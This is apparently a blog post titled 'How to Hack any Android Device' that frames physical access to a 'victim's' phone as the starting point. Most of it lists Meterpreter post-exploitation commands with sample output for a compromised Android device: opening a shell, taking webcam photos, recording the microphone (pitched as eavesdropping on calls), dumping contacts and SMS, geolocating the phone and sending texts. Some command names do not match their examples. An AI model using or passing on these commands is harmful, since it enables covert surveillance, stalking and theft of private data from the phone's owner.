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How to Hack any android device

   How to Hack any Android Device   


  • kali perating system
  • internet connection
  • victims mobile phone for 10 seconds

so if you want to know the steps i will update it soon here but till then you can watch the video here and the commands to control the victims mobile phone is below 



The pwd command allows you to see the current directory you're in.
meterpreter > pwd

The cd command allows you to change directory. For example:
meterpreter > cd cache
meterpreter > ls
The cat command allows you to see the contents of a file.
The ls command displays items in a directory. For example:
meterpreter > ls
Listing: /data/data/com.metasploit.stage/files

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  0     fil   2016-03-08 14:56:08 -0600  rList-com.metasploit.stage.MainActivity
The upload command allows you to upload a file to the remote target. The -r option allows you to do so recursively.
The download command allows you to download a file from the remote target. The -r option allows you to do so recursively.
The search command allows you to find files on the remote target. For example:
meterpreter > search -d . -f *.txt
The ifconfig command displays the network interfaces on the remote machine.
meterpreter > ifconfig


Interface 10
Name         : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address :
IPv4 Netmask :
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::

The getuid command shows the current user that the payload is running as:
meterpreter > getuid
Server username: u0_a231
The ps command shows a list of processes the Android device is running. For example:
meterpreter > ps 

Process List

 PID    Name                                                         Arch  User
 ---    ----                                                         ----  ----
 1      /init                                                              root
 2      kthreadd                                                           root
 3      ksoftirqd/0                                                        root
 7      migration/0                                                        root
 8      rcu_preempt                                                        root
 9      rcu_bh                                                             root
 10     rcu_sched                                                          root
 11     watchdog/0                                                         root
 12     watchdog/1                                                         root
 13     migration/1                                                        root
 14     ksoftirqd/1                                                        root
 17     watchdog/2                                                         root
 18     migration/2                                                        root
 19     ksoftirqd/2                                                        root
 22     watchdog/3                                                         root
 23     migration/3                                                        root

The shell command allows you to interact with a shell:
meterpreter > shell
Process 1 created.
Channel 1 created.
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
The sysinfo command shows you basic information about the Android device.
meterpreter > sysinfo
Computer    : localhost
OS          : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
The webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
The webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
The record_mic command records audio. Good for listening to a phone conversation, as well as other uses. Example:
meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
The activity_start command is an execute command by starting an Android activity from a URI string.
The check_root command detects whether your payload is running as root or not. Example:
meterpreter > check_root
[*] Device is not rooted
The dump_calllog command retrieves the call log from the Android device.
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
The geolocate commands allows you to locate the phone by retrieving the current lat-long using geolocation.
The wlan_geolocation command allows you to locate the phone by retrieving the current lat-long using WLAN information. Example:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL:*******,-97.*******
The send_sms command allows you to send an SMS message. Keep in mind the phone will keep a copy of it, too.
meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
The sms_dump command allows you to retrieve SMS messages. And save them as a text file. For example:
meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt


$ cat sms_dump_20160308163212.txt

[+] SMS messages dump

Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP:
Remote Port: 59130

Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Message : Hello world


The run command allows you to run a post module against the remote machine at the Meterpreter prompt. For example:
meterpreter > run post/android/capture/screen 


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